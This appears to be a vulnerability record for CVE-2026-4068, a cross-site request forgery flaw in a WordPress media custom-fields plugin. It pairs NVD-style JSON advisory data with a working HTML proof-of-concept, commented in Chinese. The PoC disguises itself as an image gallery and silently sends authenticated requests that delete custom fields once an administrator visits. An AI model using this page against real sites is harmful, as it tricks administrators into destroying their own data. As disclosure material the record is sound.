CVE-2026-4068

<!-- CSRF PoC for CVE-2026-4068 - Delete arbitrary media custom fields --> <!--诱骗已登录的管理员访问此页面，自动删除指定字段--> <!DOCTYPE html> <html> <head> <title>Image Gallery</title> </head> <body> <h1>Check out these images!</h1> <img src="https://target-site.com/wp-content/uploads/2024/01/photo.jpg" alt="Photo"> <!-- 隐藏的CSRF攻击代码 --> <script> // 构造删除媒体字段的恶意请求 // 攻击者需要知道字段名称，可以枚举或通过其他方式获取 const maliciousFields = [ 'custom_author_field', 'custom_copyright_field', 'custom_alt_text', 'custom_description_field' ]; // 自动发送删除请求 maliciousFields.forEach(fieldName => { // 构造删除字段的GET请求 const deleteUrl = 'http://target-site.com/wp-admin/admin.php?page=add-custom-fields-to-media&delete=' + encodeURIComponent(fieldName); // 使用img标签的src属性自动发起GET请求 const img = document.createElement('img'); img.src = deleteUrl; img.style.display = 'none'; document.body.appendChild(img); }); // 使用fetch API发送请求（更可靠） maliciousFields.forEach(fieldName => { fetch('http://target-site.com/wp-admin/admin.php?page=add-custom-fields-to-media&delete=' + encodeURIComponent(fieldName), { method: 'GET', credentials: 'include' // 携带目标站点的Cookie }); }); </script> <p>Click <a href="http://target-site.com/wp-admin/admin.php?page=add-custom-fields-to-media&delete=any_field">here</a> for more images.</p> </body> </html>

{"cve": {"id": "CVE-2026-4068", "sourceIdentifier": "[email protected]", "published": "2026-03-19T07:16:00.090", "lastModified": "2026-04-22T21:32:08.360", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Add Custom Fields to Media plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.3. This is due to missing nonce validation on the field deletion functionality in the admin display template. The plugin properly validates a nonce for the 'add field' operation (line 24-36), but the 'delete field' operation (lines 38-49) processes the $_GET['delete'] parameter and calls update_option() without any nonce verification. This makes it possible for unauthenticated attackers to delete arbitrary custom media fields via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link."}, {"lang": "es", "value": "El plugin Add Custom Fields to Media para WordPress es vulnerable a la falsificación de petición en sitios cruzados en todas las versiones hasta la 2.0.3, inclusive. Esto se debe a la falta de validación de nonce en la funcionalidad de eliminación de campos en la plantilla de visualización del administrador. El plugin valida correctamente un nonce para la operación de 'añadir campo' (líneas 24-36), pero la operación de 'eliminar campo' (líneas 38-49) procesa el parámetro $_GET['delete'] y llama a update_option() sin ninguna verificación de nonce. Esto hace posible que atacantes no autenticados eliminen campos de medios personalizados arbitrarios a través de una petición falsificada, siempre que puedan engañar a un administrador del sitio para que realice una acción como hacer clic en un enlace."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/add-custom-fields-to-media/tags/2.0.3/admin/partials/add-custom-fields-to-media-admin-display.php#L38", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/add-custom-fields-to-media/tags/2.0.3/admin/partials/add-custom-fields-to-media-admin-display.php#L48", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/add-custom-fields-to-media/trunk/admin/partials/add-custom-fields-to-media-admin-display.php#L38", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/add-custom-fields-to-media/trunk/admin/partials/add-custom-fields-to-media-admin-display.php#L48", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3481588%40add-custom-fields-to-media&new=3481588%40add-custom-fields-to-media&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/259a4950-9377-4d18-86ad-aadd97dcdbc7?source=cve", "source": "[email protected]"}]}}